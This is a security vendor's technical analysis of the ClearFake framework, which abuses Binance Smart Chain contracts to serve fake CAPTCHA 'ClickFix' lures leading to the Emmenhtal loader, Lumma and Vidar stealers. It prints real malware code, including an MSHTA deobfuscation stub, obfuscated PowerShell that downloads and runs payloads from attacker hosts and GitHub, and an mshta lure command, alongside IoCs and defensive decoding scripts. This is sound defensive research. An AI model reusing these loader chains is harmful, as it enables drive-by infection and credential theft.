Introduction

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through the drive-by download technique. When it first emerged in July 2023, the injected code was designed to display a fake web browser download page, tricking users into downloading counterfeit browser updates. By May 2024, ClearFake adopted the new social engineering tactic ClickFix, displaying fake error messages in the web browser and deceiving users into copying and executing a given malicious PowerShell code that finally infected their systems.

The Sekoia Threat Detection & Research (TDR) team discovered that since December 2024, ClearFake has included new lures. This latest variant uses fake reCAPTCHA or Cloudflare Turnstile verifications, along with fake technical issues, to trick users into resolving these CAPTCHA challenges and finally executing malicious PowerShell code.

Although this new ClearFake variant continues to rely on the EtherHiding technique and the ClickFix tactic, it has introduced additional interactions with the Binance Smart Chain. By using smart contract’s Application Binary Interfaces, these interactions involve loading multiple JavaScript codes and additional resources that fingerprint the victim’s system, as well as downloading, decrypting and displaying the ClickFix lure.

This report report aims to provide a technical analysis of ClearFake’s latest variant, focusing primarily on the interactions with the Binance Smart Chain introduced in its latest version. Notably, the cybersecurity researcher Marek Szustak published a comprehensive report on a similar ClearFake version in early January 2025.

Historical overview of ClearFake variants

In this section, we present an overview of the primary ClearFake variants that we have previously analysed in our report reports ClearFake: a newcomer to the “fake updates” threats landscape published in October 2023, and New widespread ClearFake variant abuses PowerShell and clipboard from June 2024. 

October 2023’s variant

As of September 2023, ClearFake used a straightforward JavaScript code injected into the compromised websites to download two additional JavaScript payloads from the ClearFake C2 server. Once executed, the second payload was designed to create a full-screen iframe element, displaying a fake web browser update.

By October 2023, ClearFake introduced a new technique called EtherHiding, which leveraged smart contracts from the Binance Smart Chain to obtain the second JavaScript payload. To achieve this, the ClearFake operator stored an obfuscated JavaScript, encoded in base64 and converted in hexadecimal, within a smart contract’s Application Binary Interface. For that, the malicious framework used the ethers.js library to interact with the Ethereum blockchain. 

In summary of ClearFake’s interactions with the blockchain, the October 2023’s variant fetched a single malicious JavaScript from one Ethereum address.

During this period, ClearFake delivered loader malware to Windows systems, including Amadey, IDAT Loader, and HIjack Loader. These loaders subsequently deployed infostealers, such as Lumma and Stealc. For macOS users, ClearFake was identified as spreading AMOS Stealer.

June 2024’s variant

As of June 2024, ClearFake continued to rely on JavaScript code stored in the Ethereum blockchain. However, the malicious framework operated with fewer steps. The script injected into compromised websites directly contacted the Binance Smart Chain to retrieve the next-stage payload, eliminating some intermediary payloads. This next-stage payload communicated with the ClearFake C2 servers to send the User-Agent value of the infected system, and fetch the HTML code for the ClearFake pop-up.

A major update in this ClearFake variant was the introduction of a new lure, featuring a pop-up that mimicked a web browser alert, deceiving users into executing a PowerShell script to supposedly resolve an issue. TDR analysts identified that this ClickFix tactic targeted users in 44 different languages for Google Chrome, Mozilla Firefox and Opera web browsers.

In June 2024, ClearFake was actively spreading Lumma Stealer.

Technical analysis

By mid-December 2024, the ClearFake framework had been updated to harden the analysis by further exploiting Web3 capabilities. Additionally, the developer encrypted the ClickFix HTML code and hosted it on Cloudflare Pages. This section provides a technical walkthrough of the malware, detailing each step involved.

JavaScript injected into compromised websites

The ClearFake framework involves injecting an initial brief JavaScript code into a legitimate website, mostly a WordPress site, which the attacker previously compromised during an initial development stage.

This script is responsible for preparing the rest of the code for further infection by loading and executing various code segments from the Binance Smart Chain. The following section details how the ClearFake developer went about using the blockchain to host, load, and execute its code. Before examining the code, here is an overview of the initial script injected into compromised websites:

1. It loads legitimate external dependencies: pako, web3, and crypto (though crypto is not used in the ClearFake code);
2. It instanciates web3 objects to interact with Binance Smart Chain using a custom Application Binary Interface (ABI);
3. It retrieves next-stage JavaScript codes from the Binance Smart Chain contract;
4. It executes the fetched code that remains opaque at this stage of execution.

The initial JavaScript evaluates the code using the following function: eval(`(async(orchid)=>{${ds}})(orchid);`), where orchid is provided as an argument to the asynchronous method of the object “ds”. 

N.B. The returned value of the functions of the ABI are strings that are compressed with the gzip algorithm and base64 encoded (c.f. the call to atob and pako.ungzip functions in the initial stage).

Interactions with Binance Smart Chain

Stage 1 – Smart Contract and ABI

ClearFake uses the web3 library to interact with the Binance Smart Chain API, as introduced in the previous section. The script instanciates an object named ct (standing for “Contract”) that is an Etherium Contract for the wallet 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53, with an Application Binary Interface (ABI) defined as follows:

[
  {inputs: [], stateMutability: "nonpayable", type: "constructor"},
  {inputs: [], name: "orchidABI", outputs: [{internalType: "string", name: "", type: "string"}], stateMutability: "view", type: "function"},
  {inputs: [], name: "orchidAddress", outputs: [{internalType: "string", name: "", type: "string"}], stateMutability: "view", type: "function"},
  {inputs: [], name: "merlionABI", outputs: [{internalType: "string", name: "", type: "string"}], stateMutability: "view", type: "function"},
  {inputs: [], name: "merlionAddress", outputs: [{internalType: "string", name: "", type: "string"}], stateMutability: "view", type: "function"}
]

Code 1. Contract ABI of the wallet 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53

In the web3 context, the Ethereum contract ABI can be seen as a set of functions, objects, structures, and classes definitions. The above ABI defines four functions, as seen in the JSON key “type”,: none of which requires parameters, but all return a string. The functions are orchidABI, orchidAddress, merlionABI, and merlionAddress.

At the time of writing, the wallet 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53 contains two contracts, both uploaded on 24 November 2024: 

1. 0x8bd8470f15a93e7944104aacadb0c901c1af56010ad287b694099aba95a6ed74 
2. 0xa8e3378b1ff56f506a5e06107d85e1b33962bf8c8bc6c9aca923878a5b6b253a

These two contracts share the same structure: a first blob of data, detailed below, and a wallet address, as highlighted in the figure 3.

N.B. The soliditylang specification details the structure of the contract regarding the web3 context.

Data starting with “H4sI” denotes the beginning of this blob that is deobfuscated by ClearFake (c.f. atob to decode the base64 then pako.gunzip to decompress the decoded data). Once decoded and decompressed, the content of the contract is available on this Gist.

The documentation of the web3 library defines how ABIs are structured and how data is stored on the Smart Chain. In the ClearFake case, data is stored in the “Input Data”, defined as:

Additional data included for this transaction. Commonly used as part of contract interaction or as a message sent to the recipient.

Data in the “Input Data” field of the contract is stored in the hexadecimal format and structured using contract ABI specification, described in the document of the Soliditylang programing language.

The raw structure of “Input Data” is an array of chunks of 32 bytes, the first 4 bytes are the Keccak-256 hash of the function signature and are not part of the contract structure itself. So it is not taken into account when computing offset. Using the contract ABI specification on the first contract 0x8bd8470f15a93e7944104aacadb0c901c1af56010ad287b694099aba95a6ed74, its structure is:

1. The first 4 bytes are the Keccak-256 hash of the function signature.
2. The 0x40 indicates the offset where the first data is located.
3. The 0x3e0 indicates the offset where the second data is located.
4. At offset 0x40, the size of the first data is defined (0x370).
5. Content of the 1st data (size: 0x370);
6. At offset 0x3e0, the size of the second data is defined (0x2a).
7. Content of the 2sd data (size: 0x2a)

Annex 1 provides a script to parse and decodes the content of the ABI.

From the first stage execution, two new wallets are retrieved by the ClearFake framework:

• 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA
• 0x8FBA1667BEF5EdA433928b220886A830488549BD

Stage 2 – JavaScript codes

The code of the second stage starts by verifying whether the cookie “data-ai-collecting-shown” is set and if not, it sets it. Then it uses the functions defined in the orchid ABI to load and execute obfuscated code, that are hosted in smart contracts of the wallet 0x8FBA1667BEF5EdA433928b220886A830488549BD.

The teaCeremony is an asynchronous function that decodes and decompresses data provided from the ABI “orchid ABI”, as shown in the code below.

const teaCeremony = async (encodedScroll, templeNumber) => {
    try {
        const cherryBlossoms = atob(encodedScroll);
        const calligraphy = Uint8Array.from(cherryBlossoms, sakura => sakura.charCodeAt(0));
        const haiku = pako.ungzip(calligraphy, { to: 'string' }).trim();
        if (haiku) {
            try {
                await eval(`(async () => { ${haiku} })()`);
            } catch (samuraiError) {
                console.error(`Samurai lost at temple ${templeNumber}:`, samuraiError);
            }
        } else {
            console.warn(`Temple ${templeNumber} is empty.`);
        }
    } catch (origamiError) {
        console.error(`Cherry blossoms failed at temple ${templeNumber}:`, origamiError);
    }
};

Code 2. JavaScript code of ClearFake stage 2 used to de-obfuscate loaded code and evaluated it

The ClearFake developer stored malicious pieces of code in the transaction of the wallet 0x8FBA1667BEF5EdA433928b220886A830488549BD.

To store the malicious JavaScript codes that are subsequently executed in the victim’s browser, the functions from the orchid ABI include: shibuyaCrossing, akihabaraLights, ginzaLuxury and asakusaTemple. Each method can be identified in the wallet by a method ID, which results from the first bytes of the Keccak-256 hash signature.

All functions used by this second stage are detailed in the table below:

Table 1. Details of the JavaScript functions loaded from orchid ABI

The reassembled code of the stage 2 is available on this Gist. 

HTML decryption

Based on the fully reassembled JavaScript code is responsible for the following actions:

1. Fingerprint the victim using the User-Agent:
   1. The operating system; 
   2. The web browser.
2. Obtain the external URL from resolved Smart Contract. This URL hosts the encrypted HTML code of the ClearFake lure displayed to visitors.
3. Download data from the URL. By February 2025, all the URLs are Cloudflare pages.
4. Download the AES key from the contract with method ID 0x167d1c4b.
5. Decode from base64 encoding and decrypt it with the AES-GCM algorithm, for the decryption the malware retrieves the Initial Vector from the first twelve bytes of the download data. (N.B. The GCM authentication tag is the same as the IV). 
6. Replace the domain example[.]net with the domain of the compromised website.
7. Embed the cleartext data in the created iframe that displays in full-screen.

To retrieve the URL hosting the ClickFix lure HTML file, as well as the AES key to decrypt the file, the code uses the merlionABI function associated with the wallet 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA. As of February 2025, this wallet includes four methods, as listed below.

Table 2. Method ID defined in the MerlionABI for the 0x53fd54f55c93f9bcca471cd0ccbabc3acbd3e4aa wallet

ClickFix lures

By February 2025, TDR analysts discovered that the ClearFake operator frequently alternated between HTML pages, each displaying one of two ClickFix lures:

• A fake Cloudflare Turnstile with unusual web traffic;
• A fake reCAPTCHA along with a DNS error.

Fake Cloudflare Turnstile and unusual web traffic

For the first ClickFIx lure, the HTML code initially presents a fake Cloudflare Turnstile verification If the user attempts to resolve this fake Cloudflare Turnstile challenge twice, additional content appears above, aligning with the ClickFix social engineering tactic. We suspect that the decoy may require two attempts to resolve the challenge in order to mimic a technical issue and make the fake error message more plausible.

This decoy claims that the Cloudflare security system detected unusual web traffic originating from the user’s IP address:

The user is then misled into following steps to proceed with verification. The instructions involve opening the Run command window using the shortcut Win+R, copying and pasting a command, and executing it.

The command is copied into the user’s clipboard data. Its content is fetched from the Binance Smart Chain via a JavaScript script embedded in the HTML (c.f. Table 2, method ID 0x67685e3e).

Once executed, the PowerShell command infected the user’s system.

Fake reCAPTCHA and DNS error

The second ClickFix lure code displays a fake reCAPTCHA challenge that includes 9 images, asking the user to select all images containing a car. This decoy is very realistic and could deceive many users into engaging with the fake reCAPTCHA challenge. It is noteworthy that the images remain the same each time.

If the user attempts to solve the fake reCAPTCHA by selecting three Images, the following error message is displayed, and a malicious PowerShell command is copied into the clipboard data.

The instructions mirror those of the Cloudflare Turnstile lure: open the Run command window by pressing Win+R, paste the command, and execute it by pressing Enter. Once executed, the PowerShell command infects the user’s system.

Next-stage payloads

PowerShell commands

By using services like BscScan and monitoring the Ethereum address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA, we compiled the list of previous PowerShell commands distributed by this ClearFake variant:

As of 24 February 2025, the latest PowerShell command distributed by the ClearFake variant are as follows:

Table 3. Historic of the PowerShell command distributed by ClearFake

These obfuscated PowerShell commands execute Mshta.exe with a script hosted on a remote server and masquerade as a video using extensions like MP3, MP4 and M4A. The script is the initial stage of Emmenhtal Loader, identified by TDR analysts as the version 2 of the loader.

Emmenhtal Loader dropping Lumma Stealer

Here is an overview of the Emmenhtal infection chain and its various payloads, as analysed by 17 February 2025.

MSHTA script

The MSHTA script code, downloaded and executed by the PowerShell command, contains the following components:

• An obfuscated payload at the start of the document.
• JavaScript code that reads the document, deobfuscates the payload, and executes the resultant code. The script also contains junk data stored within the script HTML elements. 

Below is an extract of the functional JavaScript code included in the MSHTA script:

window.moveTo(9999,0);
window.onerror = function(){return true};
var hbWzFR = document.documentElement.outerHTML;
var ejVxqZ = hbWzFR.substring(27 , 24993);
eval(ejVxqZ.replace(/(..)./g, function(match, p1) {return String.fromCharCode(parseInt(p1, 16))}));
window.close();

Code 3.  Functional JavaScript code embedded in the initial Emmenhtal MSHTA script

Deobfuscated JavaScript payload

The JavaScript script decodes the obfuscated payload into another JavaScript code designed to be executed in a Windows environment.

Below is a beautified extract of the deobfuscMohammed Bou-Saber is currently editingated payload:

hbWzFR(odpyy) {
    var ejVxqZ = '';
    for (var rCMRG = 0; rCMRG < odpyy.length; rCMRG++) {
      var tFMAa = String.fromCharCode(odpyy[rCMRG] - 116);
      ejVxqZ = ejVxqZ + tFMAa;
    }
    return ejVxqZ;
}

var ejVxqZ = hbWzFR([228, 227, 235, 217, 230, 231, 220, /*redacted*/]);
var rCMRG = hbWzFR([203, 199, 215, 230, 221, 228, 232, 162, 199, 220, 217, 224, 224]);

var hbWzFR = new ActiveXObject(rCMRG);
hbWzFR.Run(ejVxqZ, 0, true);

Code 4. Deobfuscated JavaScript code serving as second Emmenhtal payload

The obfuscation involves subtracting each value of the array “ejVxqZ” by the hardcoded constant “116” and then casting the result to a string using the ASCII table. The deobfuscated string is a PowerShell script that is executed using an ActiveXObject with the VBScript method WSScript.Shell.Run.

PowerShell script 1

Here is the deobfuscated version of a PowerShell script used by Emmenhtal Loader:

powershell.exe -w 1 -ep Unrestricted -nop function PMWks($TzmkWwVw){-split($TzmkWwVw -replace '..', '0x$& ')};$HInQRiv=PMWks('/*aes-encrypted-payload*/');$WTbSz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((PMWks('6D6C646E664C595246466A4A64464A51')),[byte[]]::new(16)).TransformFinalBlock($HInQRiv,0,$HInQRiv.Length)); & $WTbSz.Substring(0,3) $WTbSz.Substring(3)

Code 5. First PowerShell script run by Emmenhtal loader

In summary, the PowerShell script decrypts an AES-encrypted payload and executes it using the PowerShell executable.

The AES-encryped payload turns out to be another PowerShell script.

PowerShell script 2

Below is the AES-decrypted PowerShell script:

iex Start-Process "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ArgumentList '-w','h','-ep','Unrestricted','-Command','Set-Item Variable:il ([Net.WebClient]::New());SV WQz (((([Net.WebClient]::New()|GM)|Where{(LS Variable:_).Value.Name -ilike ''*wn*d*g''}).Name));Set-Variable HMo ''hxxps://ty.klipxytozyi[.]shop/kangarooing.bmp'';Invoke-Command((Item Variable:/E*tex*).Value.InvokeCommand.(((Item Variable:/E*tex*).Value.InvokeCommand.PsObject.Methods|Where{(LS Variable:_).Value.Name -ilike ''*r*ock''}).Name)((Variable il).Value.((GV WQz -Value))((GI Variable:/HMo).Value)))';$MtozVIFS = $env:AppData;function GgSWgWFLW($RuBLC, $JXPOi){curl $RuBLC -o $JXPOi};function fypzzhB(){function hLPZA($TslB){if(!(Test-Path -Path $JXPOi)){GgSWgWFLW $TslB $JXPOi}}}fypzzhB;

Code 6. Second PowerShell script executed by Emmenhtal loader to download next stage payload

This script downloads malicious code located at hxxps://ty.klipxytozyi[.]shop/kangarooing.bmp, using the curl utility in a custom function. The downloaded payload is stored into the Windows AppData folder and is executed using the PowerShell commandlet “iex Start-Process”.

The downloaded code kangarooing.bmp turns out to be a larger and more heavily obfuscated PowerShell script.

PowerShell script 3

This PowerShell script is approximately 17MB and employs multiple obfuscation techniques:

• XOR obfuscation
• Use of arithmetic expressions
• Character conversion
• Use of random variable names

Its purpose is to bypass the Windows Antimalware Scan Interface (AMSI) mechanism, decrypt an embedded payload, and execute it.

The final-stage payload corresponds to Lumma Stealer for this analysis.

Vidar Stealer

It is noteworthy that in addition to distributing Emmenhtal Loader and Lumma Stealer, ClearFake also spread Vidar Stealer in January 2025.

As of 25 January 2025, this ClearFake variant was deploying a straightforward PowerShell loader, which downloaded various stages from GitHub. The final-stage payload was a sample of Vidar Stealer.

Below are the main steps of this infection chain:

1. The ClickFix lure deceived users to execute the following MSHTA command:

mshta hxxps://microsoft-dns-reload-1r.pages[.]dev # “Microsoft Windows: DNS service Reload and Restart UP

2. The MSHTA code includes a VBScript that executes the following PowerShell command:

powershell -NoProfile -ExecutionPolicy Bypass -Command ""& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1ZpbmNlbnQtNDgvaHRtbC9yZWZzL2hlYWRzL21hc3Rlci9wYWdlLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}""

3. The PowerShell command downloads and executes another PowerShell script from GitHub (hxxps://raw.githubusercontent[.]com/Vincent-48/html/refs/heads/master/page.txt).

4. This second PowerShell script proceeds to download and execute an executable from GitHub (hxxps://raw.githubusercontent[.]com/Vincent-48/html/refs/heads/master/TestLAB.exe). The script then uploads the victim’s public IP address to the C2 URL (hxxps://lapkimeow[.]icu/run).

5. The executable is a Vidar Stealer sample.

Conclusion

The analysis of the latest ClearFake variant reveals a persistent and evolving threat that TDR analysts have been monitoring since its emergence in July 2023. As detailed in this analysis of the February 2025 version, the operator has consistently updated the framework code, lures, and distributed payloads on a daily basis. ClearFake execution now relies on multiple pieces of data stored in the Binance Smart Chain, including JavaScript code, AES key, URLs hosting lure HTML files, and ClickFix PowerShell commands.

This “EtherHiding” technique presents a double-edged sword. On one hand, it makes the malicious content impossible to remove from the blockchain and allows attackers to use a legitimate database to store malicious content. On the other hand, it opens the door for other threat actors to leverage the framework and its large infrastructure to insert their own PowerShell commands.

The number of websites compromised by ClearFake suggest that this threat remains widespread and affects many users worldwide. In July 2024, TDR analysts had access to daily statistics on the number of visitors on compromised websites, revealing that approximately 200,000 unique users were potentially exposed to ClearFake lures encouraging them to download malware.

To protect our customers from ClearFake, Sekoia.io analysts will continue to proactively monitor this threat.

IoCs & Technical details

Websites compromised by ClearFake

Using internet scanning engines like Censys or PublicWWW, we can search for websites containing the initial JavaScript code injected into compromised WordPress sites.

The wallet address 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53, which stores the two initial ABIs, as well as two other wallet addresses used by the ClearFake framework, can be used to identify the compromised websites.

Sekoia analysts use the following query on Censys to uncover websites compromised by ClearFake:

services.http.response.body:”0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53″

As of 24 February 2025, this query yielded over 9,300 results. However, we believe that these results are not exhaustive, and that tens of thousands of websites may be infected by ClearFake at the time of writing this report.

URLs hosting ClickFix lure HTML files

By monitoring the wallet address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA and analysing the transaction data associated with method ID 0x4128180a, we can compile a list of URLs hosting the ClickFIx lure HTML files over the past month:

URLs hosting next-stage payload spread by ClearFake

Similarly, by monitoring the wallet address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA and fetching transaction data associated with method ID 0x67685e3e, we can compile a list of PowerShell commands distributed by this ClearFake variant. This process allows us to extract the URLs hosting the initial stage of Emmenhtal Loader as of February 2025, and other next-stage spread by ClearFake

Before 2 February 2025, the malicious PowerShell command distributed by the ClickFix lure was embedded in the HTML code, rather than being fetched from the Binance Smart Chain. On 25 February, the operator resumed inserting the command directly into the encrypted HTML page hosted on the Cloudflare pages.

External references

• ClearFake: a newcomer to the “fake updates” threats landscape
• ClickFix tactic: The Phantom Meet
• https://security.szustak.pl/etherhide/etherhide.html
• https://www.npmjs.com/package/pako
• https://www.npmjs.com/package/web3
• https://en.wikipedia.org/wiki/Application_binary_interface
• https://bscscan.com/address/0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53
• https://gist.github.com/lbpierre/3f914c8c54602821dbad7179a0242ac6
• https://docs.web3js.org/api/web3-eth-abi/function/encodeFunctionSignature/
• https://docs.soliditylang.org/en/latest/abi-spec.html#json
• https://gist.github.com/lbpierre/3f914c8c54602821dbad7179a0242ac6
• https://bscscan.com/address/0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA

Annexes

Annex 1 – Contract parser

import base64
import gzip
import struct

unpack = lambda x, y: struct.unpack(x, y)[0]


def decode_ABI(raw_abi: bytes) -> str:
    """ABI reader -> decode from the base64 and
    then decrompressed it using gzip algorithm."""

    decoded_base64 = base64.b64decode(raw_abi)

    return gzip.decompress(decoded_base64).decode()


def parse_contract(raw_contract: bytes):
    """Parse the raw content of the contract"""

    contract_content = raw_contract[4:]
    keccab = unpack(">L", raw_contract[:4])

    offset_data_1 = int.from_bytes(
        unpack(">30x2s", contract_content[:0x20])
    )  # because the value is a hex representation

    offset_data_2 = int.from_bytes(
        unpack(">30x2s", contract_content[0x20:0x40])
    )  # because the value is a hex representation

    len_data_1 = int.from_bytes(
        unpack(">30x2s", contract_content[offset_data_1 : offset_data_1 + 0x20])
    )

    len_data_2 = int.from_bytes(
        unpack(">30x2s", contract_content[offset_data_2 : offset_data_2 + 0x20])
    )

    data_1 = unpack(
        f">{len_data_1}s",
        contract_content[offset_data_1 + 0x20 : offset_data_1 + 0x20 + len_data_1],
    )

    data_2 = unpack(
        f">{len_data_2}s",
        contract_content[offset_data_2 + 0x20 : offset_data_2 + 0x20 + len_data_2],
    )

    print(
        f"contract hash (Keccak-256): 0x{keccab:x}\n"
        f"offset of the 1st data: 0x{offset_data_1:x} with a length is 0x{len_data_1:x}\n"
        f"offset of the 2sd data: 0x{offset_data_2:x} with a length is 0x{len_data_2:x}"
    )

    print(f"[Data 1]: ABI (base64 and gzip): {data_1}")
    print(f"[Data 2]: Wallet {data_2}")
    ABI = decode_ABI(data_1)
    print(f"The decoded ABI is: \n{ABI}")


parse_contract(rc)

Annex 2 – Python snippet to decrypt ClickFix lure HTML files

import argparse
import base64
from Crypto.Cipher import AES


def decrypt(aes_key: str, blob: str):
    """Decoded the file content (base64), extract the IV
    from the twelve first bytes, then decrypt the ciphertext
    using the AES-GCM algorithm and"""

    key = base64.b64decode(aes_key)
    debase64_blob = base64.b64decode(blob)
    iv = debase64_blob[:12]
    gcm_tag = iv

    cipher = AES.new(key, AES.MODE_GCM, gcm_tag)
    plaintext = cipher.decrypt(debase64_blob[12:])

    return plaintext


def decode_script(cleartext: bytes) -> str:
    """Debugging function, print out the decrypted data,

    decode the data to prepare the script"""
    script = ""

    for line in cleartext.split(b"\r\n"):
        try:
            _line = line.decode()
            script += _line
        except Exception:
            pass
        else:
            print(_line)

    return script


def decrypt_lure(filepath: str, aes_key: str) -> None:
    """Read the input file, then call the decrypt
    function before writing the result into the file:
    `{filepath}-clear.html`"""

    with open(filepath, "r") as f:
        blob = f.read()

    cleartext = decrypt(blob=blob, aes_key=aes_key)
    script = decode_script(cleartext)
    with open(f"{filepath}-clear.html", "w") as f:
        f.write(script)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Process a file with a given AES key.")
    parser.add_argument(
        "--file", "-f", help="Path to the input file (Base64 and encrypted content)."
    )
    parser.add_argument("--key", "-k", help="AES key in base64 encoding")
    args = parser.parse_args()

    decrypt_lure(filepath=args.file, aes_key=args.key)

Share this post: